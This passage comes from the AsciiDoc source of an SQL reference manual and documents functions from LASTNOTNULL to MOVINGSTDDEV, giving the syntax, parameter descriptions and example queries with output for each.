extension.\r\n\r\n```\r\nLASTNOTNULL(column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If only null values have been returned, LASTNOTNULL returns null.\r\n\r\n[[examples_of_lastnotnull]]\r\n=== Examples of LASTNOTNULL\r\n\r\n* Return the last non-null value of a column:\r\n+\r\n\r\n```\r\nSELECT LASTNOTNULL(I1) AS lastnotnull\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nlastnotnull\r\n-----------\r\n 6215\r\n 6215\r\n 19058\r\n 19058\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lcase_function]]\r\n== LCASE Function\r\n\r\nThe LCASE function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LCASE returns the same character. LCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LCASE function is equal to\r\nthe result returned by the <<lower_function,LOWER Function>>.\r\n\r\nLCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nLCASE is a {project-name} SQL extension.\r\n\r\n```\r\nLCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to down-shift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_lcase]]\r\n=== Examples of LCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n--------------- --------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<ucase_function,UCASE Function>>.\r\n\r\n<<<\r\n[[left_function]]\r\n=== LEFT Function\r\n\r\nThe LEFT function returns the leftmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nLEFT is a {project-name} SQL extension.\r\n\r\n```\r\nLEFT (character-expr, count)\r\n```\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the leftmost specified\r\nnumber of characters. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number count must be a value of exact numeric data type greater\r\nthan or equal to 0 with a scale of zero.\r\n\r\n[[examples_of_left]]\r\n=== Examples of LEFT\r\n\r\n* Return_'robert':\r\n+\r\n```\r\nleft('robert john smith', 6)\r\n```\r\n\r\n* Use the LEFT function to append the company name to the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job SET jobdesc = LEFT (jobdesc, 11) ||' COMNET';\r\n\r\nSELECT jobdesc FROM persnl.job;\r\n\r\nJob Description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\nENGINEER COMNET\r\nPROGRAMMER COMNET\r\nACCOUNTANT COMNET\r\nADMINISTRAT COMNET\r\nSECRETARY COMNET\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[locate_function]]\r\n== LOCATE Function\r\n\r\nThe LOCATE function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the LOCATE function is equal to the result returned by the\r\n<<position_function,Position Function>>.\r\n\r\nLOCATE is a {project-name} SQL extension.\r\n\r\n```\r\nLOCATE(substring-expression,source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nthe _source-expression_ cannot be null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. If substring-expression is not found in source-expression , {project-name}\r\nSQL returns 0.\r\n\r\n[[considerations_for_locate]]\r\n=== Considerations for LOCATE\r\n\r\n[[result_of_locate]]\r\n==== Result of LOCATE\r\n\r\n* If the length of _source-expression_ is zero and the length of\r\n_substring-expression_ is greater than zero, {project-name} SQL returns 0.\r\n* If the length of _substring-expression_ is zero, {project-name} SQL returns 1.\r\n* If the length of _substring-expression_ is greater than the length of\r\n_source-expression_, {project-name} SQL returns 0.\r\n* If _source-expression_ is a null value, {project-name} SQL returns a null value.\r\n\r\n[[using_ucase]]\r\n==== Using UCASE\r\n\r\nTo ignore case in the search, use the UCASE function (or the LCASE\r\nfunction) for both the _substring-expression_ and the _source-expression_.\r\n\r\n[[examples_of_locate]]\r\n=== Examples of LOCATE\r\n\r\n* Return the value 8 for the position of the substring 'John' within the string:\r\n+\r\n```\r\nLOCATE ('John','Robert John Smith')\r\n```\r\n\r\n* Suppose that the EMPLOYEE table has an EMPNAME column that contains\r\nboth the first and last names. This SELECT statement returns all records\r\nin table EMPLOYEE that contain the substring 'SMITH', regardless of\r\nwhether the column value is in uppercase or lowercase characters:\r\n+\r\n```\r\nSELECT * FROM persnl.employee\r\nWHERE LOCATE ('SMITH',UCASE(empname)) > 0 ;\r\n```\r\n\r\n<<<\r\n[[log_function]]\r\n== LOG Function\r\n\r\nThe LOG function returns the natural logarithm of a numeric value\r\nexpression. LOG is a {project-name} SQL extension.\r\n\r\n```\r\nLOG (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the LOG function. The value of the argument must be greater\r\nthan zero. See <<numeric_value_expressions>>.\r\n\r\n[[examples_of_log]]\r\n=== Examples of LOG\r\n\r\n* This function returns the value 6.93147180559945344e-001, or\r\napproximately 0.69315:\r\n+\r\n```\r\nLOG (2.0)\r\n```\r\n\r\n<<<\r\n[[log10_function]]\r\n=== LOG10 Function\r\n\r\nThe LOG10 function returns the base 10 logarithm of a numeric value\r\nexpression.\r\n\r\nLOG10 is a {project-name} SQL extension.\r\n\r\n```\r\nLOG10 (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the LOG10 function. The value of the argument must be\r\ngreater than zero.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_log10]]\r\n=== Examples of LOG10\r\n\r\n* This function returns the value 1.39794000867203776E+000, or\r\napproximately 1.3979:\r\n+\r\n```\r\nLOG10 (25)\r\n```\r\n\r\n<<<\r\n[[lower_function]]\r\n== LOWER Function\r\n\r\nThe LOWER function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LOWER returns the same character. LOWER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LOWER function is equal to\r\nthe result returned by the <<lcase_function,LCASE Function>>.\r\n\r\nLOWER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nLOWER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to down-shift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_lower]]\r\n=== Considerations for LOWER\r\n\r\nFor a UTF8 character expression, the LOWER function down-shifts all the\r\nuppercase or title case characters in a given string to lowercase and\r\nreturns a character string with the same data type and character set as\r\nthe argument.\r\n\r\nA lower case character is a character that has the \"alphabetic\" property\r\nin Unicode Standard 2 whose Unicode name includes lower. An uppercase\r\ncharacter is a character that has the \"alphabetic\" property in the\r\nUnicode Standard 2 and whose Unicode name includes _upper_. A title\r\ncase character is a character that has the Unicode \"alphabetic\" property\r\nand whose Unicode name includes _title_.\r\n\r\n<<<\r\n[[examples_of_lower]]\r\n=== Examples of LOWER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return the result in uppercase and\r\nlowercase letters by using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ---------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\nSee <<upper_function,UPPER Function>>.\r\n\r\n<<<\r\n[[lpad_function]]\r\n=== LPAD Function\r\n\r\nThe LPAD function pads the left side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nLPAD is a {project-name} SQL extension.\r\n\r\n```\r\nLPAD (str, len [,padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made. If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_pad-character_`\r\n+\r\ncan be an expression and may be a string.\r\n\r\n[[examples_of_lpad]]\r\n=== Examples of LPAD\r\n\r\n* This function returns ' kite':\r\n+\r\n```\r\nLPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nLPAD('kite', 2)\r\n```\r\n\r\n* This function returns '0000kite':\r\n+\r\n```\r\nLPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nLPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'John,John, go fly a kite'':\r\n+\r\n```\r\nLPAD('go fly a kite', 23, 'John,')\r\n```\r\n\r\n<<<\r\n[[ltrim_function]]\r\n== LTRIM Function\r\n\r\nThe LTRIM function removes leading spaces from a character string. If\r\nyou must remove any leading character other than space, use the TRIM\r\nfunction and specify the value of the character. See the <<trim_function,TRIM Function>>.\r\n\r\nLTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nLTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim leading spaces.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ltrim]]\r\n=== Considerations for LTRIM\r\n\r\n[[result_of_ltrim]]\r\n==== Result of LTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_ltrim]]\r\n=== Examples of LTRIM\r\n\r\n* Return 'Robert ':\r\n+\r\n```\r\nLTRIM (' Robert ')\r\n```\r\n\r\nSee <<trim_function,TRIM Function>> and <<rtrim_function,RTRIM Function>>.\r\n\r\n<<<\r\n[[max_function]]\r\n== MAX\/MAXIMUM Function\r\n\r\nMAX is an aggregate function that returns the maximum value within a set\r\nof values. MAXIMUM is the equivalent of MAX wherever the function name\r\nMAX appears within a statement. The data type of the result is the same\r\nas the data type of the argument.\r\n\r\n```\r\nMAX | MAXIMUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe maximum of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the MAX\/MAXIMUM function is\r\napplied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the maximum. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the\r\nMAX\/MAXIMUM function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_. All nulls are\r\neliminated before the function is applied to the set of values. If the\r\nresult table is empty, MAX\/MAXIMUM returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[considerations_for_max]]\r\n=== Considerations for MAX\/MAXIMUM\r\n\r\n[[operands_of_the_expression]]\r\n=== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nMAX (SALARY)\r\nMAX (SALARY * 1.1)\r\nMAX (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_max]]\r\n=== Examples of MAX\/MAXIMUM\r\n\r\n* Display the maximum value in the SALARY column:\r\n+\r\n```\r\nSELECT MAX (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 175500.00\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[md5_function]]\r\n== MD5 Function\r\n\r\nCalculates an MD5 128-bit checksum for the string. The value is returned\r\nas a string of 32 hexadecimal digits, or NULL if the argument was NULL. \r\n\r\n```\r\nMD5( _expression_)\r\n```\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the MD5. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, MD5 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_md5]]\r\n=== Examples of MD5 \r\nThe return value is a nonbinary string in the connection character set.\r\n```\r\n>>SELECT MD5('testing') from dual;\r\n\r\n(EXPR)\r\n---------------------------------\r\n'ae2b1fca515949e5d54fb22b8ed95575'\r\n```\r\n\r\n<<<\r\n[[min_function]]\r\n== MIN Function\r\n\r\nMIN is an aggregate function that returns the minimum value within a set\r\nof values. The data type of the result is the same as the data type of\r\nthe argument.\r\n\r\n```\r\nMIN ([ALL | DISTINCT] _expression_)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe minimum of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the MIN function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\ncomputation of the minimum. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the MIN\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_. All nulls are eliminated before\r\nthe function is applied to the set of values. If the result table is\r\nempty, MIN returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[considerations_for_min]]\r\n=== Considerations for MIN\r\n\r\n[[operands_of_the_expression_3]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nMIN (SALARY)\r\nMIN (SALARY * 1.1)\r\nMIN (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n<<<\r\n[[examples_of_min]]\r\n=== Examples of MIN\r\n\r\n* Display the minimum value in the SALARY column:\r\n+\r\n```\r\nSELECT MIN (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 17000.00\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[minute_function]]\r\n== MINUTE Function\r\n\r\nThe MINUTE function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value, in the range 0 through 59, that represents the\r\ncorresponding minute of the hour.\r\n\r\nMINUTE is a {project-name} SQL extension.\r\n\r\n```\r\nMINUTE (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_minute]]\r\n=== Examples of minute\r\n\r\n* Return an integer that represents the minute of the hour from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MINUTE(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 15\r\n```\r\n\r\n<<<\r\n[[mod_function]]\r\n== MOD Function\r\n\r\nThe MOD function returns the remainder (modulus) of an integer value\r\nexpression divided by an integer value expression.\r\n\r\nMOD is a {project-name} SQL extension.\r\n\r\n```\r\nMOD (integer-expression-1,integer-expression-2)\r\n```\r\n\r\n* `_integer-expression-1_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT, INTEGER, or\r\nLARGEINT that specifies the value for the dividend argument of the MOD\r\nfunction.\r\n\r\n* `_integer-expression-2_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT, INTEGER, or\r\nLARGEINT that specifies the value for the divisor argument of the MOD\r\nfunction. The divisor argument cannot be zero.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_mod]]\r\n=== Examples of MOD\r\n\r\n* This function returns the value 2 as the remainder or modulus:\r\n+\r\n```\r\nMOD(11,3)\r\n```\r\n\r\n<<<\r\n[[month_function]]\r\n== MONTH Function\r\n\r\nThe MONTH function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n\r\nMONTH is a {project-name} SQL extension.\r\n\r\n```\r\nMONTH (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_month]]\r\n=== Examples of MONTH\r\n\r\n* Return an integer that represents the month of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MONTH(start_date) FROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 4\r\n```\r\n\r\n<<<\r\n[[monthname_function]]\r\n== MONTHNAME Function\r\n\r\nThe MONTHNAME function converts a DATE or TIMESTAMP expression into a\r\ncharacter literal that is the name of the month of the year (January,\r\nFebruary, and so on).\r\n\r\nMONTHNAME is a {project-name} SQL extension.\r\n\r\n```\r\nMONTHNAME (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_monthname]]\r\n=== Considerations for MONTHNAME\r\n\r\nThe MONTHNAME function returns the name of the month in ISO8859-1.\r\n\r\n[[examples_of_monthname]]\r\n=== Examples of MONTHNAME\r\n\r\n* Return a character literal that is the month of the year from the\r\nstart date column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, MONTHNAME(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ---------\r\n2008-04-10 2008-04-21 08:15:00.000000 April\r\n```\r\n\r\n<<<\r\n[[movingavg_function]]\r\n== MOVINGAVG Function\r\n\r\nThe MOVINGAVG function is a sequence function that returns the average\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGAVG(column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\ninteger-_expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGAVG returns the same result as\r\nRUNNINGAVG:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingavg]]\r\n=== Examples of MOVINGAVG\r\n\r\n* Return the average of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nCREATE TABLE db.mining.seqfcn (I1 INTEGER, ts TIMESTAMP);\r\n\r\nSELECT MOVINGAVG (I1,3) AS MOVINGAVG3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nI1 TS\r\n6215 TIMESTAMP '1950-03-05 08:32:09'\r\n28174 TIMESTAMP '1951-02-15 14:35:49'\r\nnull TIMESTAMP '1955-05-18 08:40:10'\r\n4597 TIMESTAMP '1960-09-19 14:40:39'\r\n11966 TIMESTAMP '1964-05-01 16:41:02'\r\n\r\nMOVINGAVG3\r\n---------------------\r\n 6215\r\n 17194\r\n 17194\r\n 16385\r\n 8281\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingcount_function]]\r\n== MOVINGCOUNT Function\r\n\r\nThe MOVINGCOUNT function is a sequence function that returns the number\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGCOUNT (column-expression, integer-expression [, max-rows])\r\n```\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGCOUNT returns the same result as\r\nRUNNINGCOUNT:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[considerations_for_movingcount]]\r\n=== Considerations for MOVINGCOUNT\r\n\r\nThe MOVINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the MOVINGCOUNT sequence function; duplicate\r\nvalues are counted.\r\n\r\n[[examples_of_movingcount]]\r\n=== Examples of MOVINGCOUNT\r\n\r\n* Return the number of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGCOUNT (I1,3) AS MOVINGCOUNT3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGCOUNT3\r\n------------\r\n 1\r\n 2\r\n 2\r\n 2\r\n 2\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmax_function]]\r\n== MOVINGMAX Function\r\n\r\nThe MOVINGMAX function is a sequence function that returns the maximum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMAX (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMAX returns the same result as\r\nRUNNINGMAX:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmax]]\r\n=== Examples of MOVINGMAX\r\n\r\n* Return the maximum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMAX (I1,3) AS MOVINGMAX3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMAX3\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingmin_function]]\r\n== MOVINGMIN Function\r\n\r\nThe MOVINGMIN function is a sequence function that returns the minimum\r\nof non-null values of a column in the current window of an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGMIN (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGMIN returns the same result as\r\nRUNNINGMIN:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingmin]]\r\n=== Examples of MOVINGMIN\r\n\r\n* Return the minimum of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGMIN (I1,3) AS MOVINGMIN3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGMIN3\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingstddev_function]]\r\n== MOVINGSTDDEV Function\r\n\r\nThe MOVINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column in the current window\r\nof an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGSTDDEV (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSTDDEV returns the same result as\r\nRUNNINGSTDDEV:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingstddev]]\r\n=== Examples of 